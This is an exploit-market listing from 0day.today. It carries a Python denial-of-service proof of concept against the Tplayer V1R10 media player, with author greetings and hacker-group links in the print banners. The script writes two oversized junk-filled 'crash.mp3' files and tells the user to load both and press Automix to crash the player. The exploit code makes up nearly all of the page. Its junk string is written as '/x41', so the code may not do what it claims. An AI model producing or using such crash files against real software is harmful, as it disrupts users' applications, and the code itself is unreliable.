[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Tplayer V1R10 Denial of Service

Author
41.w4r10r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13786
Category
dos / poc
Date add
23-08-2010
Platform
windows
===============================
Tplayer V1R10 Denial of Service 
===============================

#!/usr/bin/python
print "--------------------Exploit By 41.w4r10r------------------------------\n"
print "-------------------41.w4r10r@gmail.com-----------------------------\n"
print "----------------Tplayer V1R10 DoS Exploit------------------------------\n"
print "-------------Vendor Site : http://www.flicenr.ca-------------------------\n"
print "Greets:B0nd, Ne0, Godwin_Austin, Fb1H2s, Eberly, Punter, The_Empty(), DZZ, Micr0 \n \n"
print "  Catch Us :  www.Garahe4hackers.com | www.Andhrahackers.com | www.ICW.in \n \n"
print "-------------------------Indian Hackers Rock-----------------------------------"

junk = "/x41" * 50000;
filename = "crash.mp3";
file = open(filename,"w")
file.writelines(junk)
file.close()
filename2="crash2.mp3";
file=open(filename2,"w")
file.writelines(junk)
file.close()
print "Two Files Created "
print "[+]Usage: Load both of Created Files in player and click on Automix Button :)"
raw_input()




#  0day.today [2024-12-24]  #